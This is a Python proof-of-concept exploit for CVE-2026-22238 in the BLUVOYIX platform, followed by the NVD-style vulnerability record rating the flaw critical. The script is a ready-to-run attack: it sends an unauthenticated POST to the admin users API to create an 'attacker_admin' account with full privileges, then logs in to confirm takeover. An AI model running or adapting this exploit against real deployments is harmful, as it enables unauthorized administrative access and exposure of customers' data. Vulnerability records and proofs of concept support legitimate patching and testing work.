CVE-2026-22238

import requests import json # CVE-2026-22238 PoC - BLUVOYIX Admin API Unauthorized User Creation # Target: BLUVOYIX platform with vulnerable admin API # Author: POC Generator TARGET_URL = "http://target-server.com" API_ENDPOINT = f"{TARGET_URL}/api/admin/users" def create_admin_user(): """ Exploit: Create admin user via unprotected admin API This PoC demonstrates the authentication bypass in BLUVOYIX admin APIs """ headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } # Malicious payload to create admin user payload = { "username": "attacker_admin", "password": "P@ssw0rd123!", "email": "[email protected]", "role": "admin", "privileges": ["read", "write", "delete", "admin"] } try: # Send unauthorized request to create admin user response = requests.post(API_ENDPOINT, json=payload, headers=headers, timeout=10) if response.status_code == 200 or response.status_code == 201: print("[+] SUCCESS: Admin user created!") print(f"[+] Username: attacker_admin") print(f"[+] Password: P@ssw0rd123!") # Login with created credentials login_endpoint = f"{TARGET_URL}/api/auth/login" login_data = {"username": "attacker_admin", "password": "P@ssw0rd123!"} login_resp = requests.post(login_endpoint, json=login_data) if login_resp.status_code == 200: print("[+] SUCCESS: Full admin access obtained!") return True else: print(f"[-] FAILED: Status code {response.status_code}") print(f"[-] Response: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] ERROR: {str(e)}") return False if __name__ == "__main__": print("=" * 50) print("CVE-2026-22238 PoC - BLUVOYIX Unauthorized Admin Creation") print("=" * 50) create_admin_user()

{"cve": {"id": "CVE-2026-22238", "sourceIdentifier": "56a186b1-7f5e-4314-ba38-38d5499fccfd", "published": "2026-01-14T15:16:05.090", "lastModified": "2026-02-02T15:51:24.527", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The vulnerability exists in BLUVOYIX due to improper authentication in the BLUVOYIX admin APIs. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable admin API to create a new user with admin privileges. Successful exploitation of this vulnerability could allow the attacker to gain full access to customers' data and completely compromise the targeted platform by logging in to the newly-created admin user."}, {"lang": "es", "value": "La vulnerabilidad existe en BLUVOYIX debido a una autenticación incorrecta en las API de administración de BLUVOYIX. Un atacante remoto no autenticado podría explotar esta vulnerabilidad enviando solicitudes HTTP especialmente diseñadas a la API de administración vulnerable para crear un nuevo usuario con privilegios de administrador. La explotación exitosa de esta vulnerabilidad podría permitir al atacante obtener acceso total a los datos de los clientes y comprometer completamente la plataforma objetivo iniciando sesión con el usuario administrador recién creado."}], "metrics": {"cvssMetricV40": [{"source": "56a186b1-7f5e-4314-ba38-38d5499fccfd", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:H/U:Red", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "HIGH", "providerUrgency": "RED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "56a186b1-7f5e-4314-ba38-38d5499fccfd", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}, {"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:blusparkglobal:bluvoyix:-:*:*:*:*:*:*:*", "matchCriteriaId": "84FDD5FA-DB87-4263-A7F2-C136D7F4155C"}]}]}], "references": [{"url": "https://blusparkglobal.com/bluvoyix/", "source": "56a186b1-7f5e-4314-ba38-38d5499fccfd", "tags": ["Product"]}]}}